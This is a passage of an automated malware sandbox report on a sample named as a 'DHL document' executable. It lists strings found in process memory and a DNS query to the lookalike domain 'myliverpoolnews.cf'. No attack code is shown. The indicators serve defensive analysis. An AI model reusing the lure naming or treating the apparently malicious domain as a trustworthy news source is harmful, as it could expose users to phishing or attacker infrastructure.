data-provider="facebook" data-tracking="facebook\|follow\|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter\|follow\|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections & Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header\|MainLogo\|Image\|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header\|SectionLabel\|Text\|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header\|DropDown\|Text\|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header\|DropDown\|Text\|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header\|SectionLabel\|Text\|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header\|DropDown\|Text\|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header\|SectionLabel\|Text\|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook\|follow\|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter\|follow\|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header\|MainLogo\|Image\|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header\|SectionLabel\|Text\|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header\|DropDown\|Text\|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header\|DropDown\|Text\|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header\|SectionLabel\|Text\|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header\|DropDown\|Text\|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header\|SectionLabel\|Text\|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook\|follow\|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter\|follow\|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster's feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle\|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster's feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle\|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
Source: svchost.exe, 00000023.00000003.482095331.000001EB10375000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-06T17:58:28.3925008Z\|\|.\|\|9f1af5de-a917-4d59-b623-fd59991517bf\|\|1152921505693355901\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-04-06T17:57:25.3126054Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE

Source: unknown

DNS traffic detected: queries for: myliverpoolnews.cf

Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: svchost.exe, 00000023.00000003.466629025.000001EB10342000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: svchost.exe, 00000023.00000003.466629025.000001EB10342000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: svchost.exe, 00000023.00000003.466629025.000001EB10342000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DHL_document11022020680908911.exe, 00000000.00000003.231282357.00000000058C1000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?02ae22cf14047
Source: DHL_document11022020680908911.exe, 00000000.00000002.296377596.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://myliverpoolnews.cf
Source: DHL_document11022020680908911.exe, 00000000.00000002.296377596.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp, svchost.exe, 00000023.00000003.466629025.000001EB10342000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000003.00000003.397779990.0000000007DAC000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/BreadcrumbList
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/ListItem
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/NewsArticle
Source: DHL_document11022020680908911.exe, 00000000.00000002.296377596.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000003.397779990.0000000007DAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000011.00000002.315276492.000002886D613000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: DHL_document11022020680908911.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: DHL_document11022020680908911.exe, 00000000.00000002.294730568.000000000148E000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: svchost.exe, 00000023.00000003.474637686.000001EB103BB000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.473525877.000001EB1036D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.473971258.000001EB1037E000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000023.00000003.474637686.000001EB103BB000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.473525877.000001EB1036D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.473971258.000001EB1037E000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/terms
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: svchost.exe, 00000011.00000003.311386179.000002886D65A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000003.310953123.000002886D64A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000011.00000003.311767855.000002886D641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000011.00000003.311767855.000002886D641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000011.00000003.311386179.000002886D65A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000003.310953123.000002886D64A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.311386179.000002886D65A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.289025096.000002886D632000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	String found in binary or memory: https://felix.data.tm-awx.com
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json"
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: powershell.exe, 00000003.00000003.397779990.0000000007DAC000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/ded/script.js
Source: DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.live
Source: svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
